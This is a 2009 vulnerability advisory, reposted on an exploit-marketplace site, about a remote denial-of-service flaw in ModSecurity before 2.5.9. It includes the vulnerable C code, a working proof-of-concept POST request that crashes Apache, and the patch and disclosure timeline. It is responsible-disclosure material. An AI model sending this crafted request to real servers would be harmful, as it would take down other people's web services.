0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
ModSecurity < 2.5.9 Remote Denial of Service Vulnerability
========================================================== ModSecurity < 2.5.9 Remote Denial of Service Vulnerability ========================================================== ============================================= INTERNET SECURITY AUDITORS ALERT 2009-001 - Original release date: February 25th, 2009 - Last revised: March 19th, 2009 - Discovered by: Juan Galiana Lara - Severity: 7.8/10 (CVSS Base Scored) ============================================= I. VULNERABILITY ------------------------- ModSecurity < 2.5.9 is vulnerable to a remote Denial of Service (DoS) II. BACKGROUND ------------------------- ModSecurity is the most widely-deployed web application firewall in the world, with more than 15,000 users. It runs as a Apache web server module and is developed by Breach Security [ http://www.breach.com ], it's avaliable with GNU GPL and many other comercial licenses. III. DESCRIPTION ------------------------- The multipart processor of modsecurity does not sanitize the user supplied input sufficiently. Therefore, an attacker can send a crafted post request of type multipart/form-data which will lead in a remote denial of service. The snippet of vulnerable code: in file msc_multipart.c 1256 int multipart_get_arguments(modsec_rec *msr, char *origin, apr_table_t *arguments) { 1257 multipart_part **parts; 1258 int i; 1259 1260 parts = (multipart_part **)msr->mpd->parts->elts; 1261 for(i = 0; i < msr->mpd->parts->nelts; i++) { 1262 if (parts[i]->type == MULTIPART_FORMDATA) { 1263 msc_arg *arg = (msc_arg *)apr_pcalloc(msr->mp, sizeof(msc_arg)); 1264 if (arg == NULL) return -1; 1265 1266 arg->name = parts[i]->name; 1267 arg->name_len = strlen(parts[i]->name); On line 1267, due to the pointer parts[i]->name is not properly sanitized the parameter of strlen function takes the value NULL, getting a segmentation fault and resulting in a crash of the apache process that handle the request. IV. PROOF OF CONCEPT ------------------------- The process could be crashed remotely by sending: POST / HTTP/1.0 Content-Type: multipart/form-data; boundary=---------------------------xxxxxxxxxxxxxx Content-Length: 91 -----------------------------xxxxxxxxxxxxxx : -----------------------------xxxxxxxxxxxxxx-- In order to send a correct HTTP/1.1 request you must add a valid Host header. With the configuration directives: SecAuditEngine On SecDebugLogLevel 9 After the attack, the last line of the debug logfile is: [25/Feb/2009:09:51:18 +0100] [vhost/sid#884348][rid#aaf0d8][/][9] Multipart: Added part abe458 to the list: name "(null)" (offset 0, length 0) V. BUSINESS IMPACT ------------------------- An attacker could cause a remote denial of service to an Apache installation with modsecurity 2 module. VI. SYSTEMS AFFECTED ------------------------- ModSecurity between 2.5.5 and 2.5.8 are vulnerable, other versions may be affected. Tested with Apache httpd 2.2.11. VII. SOLUTION ------------------------- Upgrade to version 2.5.9 of ModSecurity. It can be downloaded from http://modsecurity.org/download/ VIII. REFERENCES ------------------------- http://www.modsecurity.org http://www.isecauditors.com IX. CREDITS ------------------------- This vulnerability has been discovered by Juan Galiana Lara (jgaliana (at) isecauditors (dot) com). Thanks to Jordi Rubio Romero (jrubio (at) isecauditorts (dot) com). X. REVISION HISTORY ------------------------- February 25, 2009: Initial release March 19, 2009: Revision. XI. DISCLOSURE TIMELINE ------------------------- Febraury 25, 2009: Vulnerability acquired by Internet Security Auditors (www.isecauditors.com) March 02, 2009: ModSecurity contacted. March 02, 2009: Response about remediation plan. March 11, 2009: Path released March 19, 2009: Published. XII. LEGAL NOTICES ------------------------- The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors, S.L. accepts no responsibility for any damage caused by the use or misuse of this information. # 0day.today [2024-11-15] #